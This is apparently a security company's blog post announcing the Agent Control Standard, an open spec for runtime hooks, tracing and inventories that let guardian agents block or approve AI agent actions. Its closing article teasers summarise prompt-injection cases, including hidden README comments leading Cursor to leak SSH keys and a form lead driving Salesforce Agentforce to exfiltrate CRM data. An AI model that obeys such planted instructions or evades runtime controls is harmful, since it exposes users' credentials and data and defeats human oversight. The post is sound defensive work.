Every agent needs a "stop". We're standardizing it.
At Capsule Security, we defend AI agents at runtime. The deeper we got into that work, the harder one thing became to ignore: runtime control of agents isn't standardized across providers. It's chaos. The industry has standards for how agents talk to each other (MCP, A2A). It has catalogs for how they go wrong (OWASP Agentic Top 10). It has no standard for how to stop an agent before it acts.
That fragmentation is why prompt injection still works. It's why rogue agents are still hard to catch. It's why every team building around agents rewrites the same plumbing.
We believe runtime control should be standardized and enforceable across every provider, so we can make life easier for agent users, keep rogue agents in check, and finally put prompt injection and rogue agents on the defensive.
That's why we're so glad to be part of the Agent Control Standard (ACS), which just went public today.
What is ACS?
ACS is an open, vendor-neutral, MIT-licensed standard for runtime governance of AI agents. The core team spans vendors, platforms, and security companies. Capsule is one of them.
ACS rests on three pillars:
- Instrument - Runtime hooks that let a Guardian Agent permit, deny, modify, ask, or defer an action before it executes.
- Trace - Structured observability for every agent decision, mapped to OpenTelemetry and OCSF so it lands in the tools security teams already use.
- Inspect - A dynamic Agent Bill of Materials (AgBOM) for self-modifying agents, mapped to CycloneDX, SPDX, and SWID.
Together they answer the three questions every security team needs answered for an agent: what did you do, what can you do, and who said you could do it?
Hooks are a foundational element of these pillars, already widely implemented across agentic frameworks and applications.
Standards work best when developers, security engineers and CISOs have a practical mental model and concrete examples to grab onto. That's why we built hooks.security: a growing, curated catalog of where hooks already exist across the agent ecosystem (Cursor, Claude Code, Copilot, MCP servers, frameworks), what each hook exposes, and how to use it safely. If you're trying to figure out where to start learning about the solutions that are already there - hooks.security is the right place for you.
Where we are, and how you can help
ACS is at v0.1.0, Public Preview, and the spec is open for review.
- The project GitHub repo that contains the spec and the early content: github.com/Agent-Control-Standard/ACS
- Project home: agentcontrolstandard.ai
- Hooks across the ecosystem: hooks.security
If you build agents, defend them, or run them in production, your review comments are how this spec gets sharper. PRs, issues, and discussion replies all count. We think this is the right moment to standardize runtime control of agents, before the chaos gets baked in. We're glad to be doing it in the open.
Read more articles
The Rise of Guardian Agents: Securing the Agentic AI Ecosystem
Guardian agents are emerging as a critical security layer for the agentic AI era. As enterprises adopt AI agents that execute tools, handle sensitive data, and operate inside real workflows, human approval loops no longer scale. Guardian agents solve this by supervising other agents in real time: monitoring actions, enforcing policy, and blocking risky behavior before execution.
.avif)
.png)
CurseChain: How Hidden README Comments Trick Cursor Into Stealing - and Spreading - Your SSH Keys
Capsule found two Cursor IDE vulnerabilities that let hidden prompt-injection instructions in referenced files steal developers’ SSH keys and contaminate future unrelated projects, causing zero-click or one-click exfiltration even when the attacker ships no malicious code.
The State of AI Agent Security 2026
Capsule Security’s State of AI Agent Security 2026 report is the largest independent audit of AI agents to date, showing that the ecosystem is rapidly shipping publicly exposed, weakly guarded, highly connected agents with recurring misconfigurations, near-absent runtime controls, widespread prompt-injection risk, expanding supply-chain exposure, and active malicious campaigns still propagating through agent skill and tool registries.
Capsule Security Raises $7M to Prevent AI Agents from Going Rogue in Runtime: Intent is the New Perimeter
Capsule is launching a runtime security platform for the agentic AI era, built to monitor and stop autonomous agents that can bypass traditional guardrails, misuse legitimate access, and create a new class of enterprise security risk.
.avif)
PipeLeak: The Lead That Stole Your Database - Exploiting Salesforce Agentforce With Indirect Prompt Injection
Capsule research team discover a critical prompt injection vulnerability in Salesforce Agentforce that allows attackers to exfiltrate CRM data through a simple lead from a form submission. No authentication required.
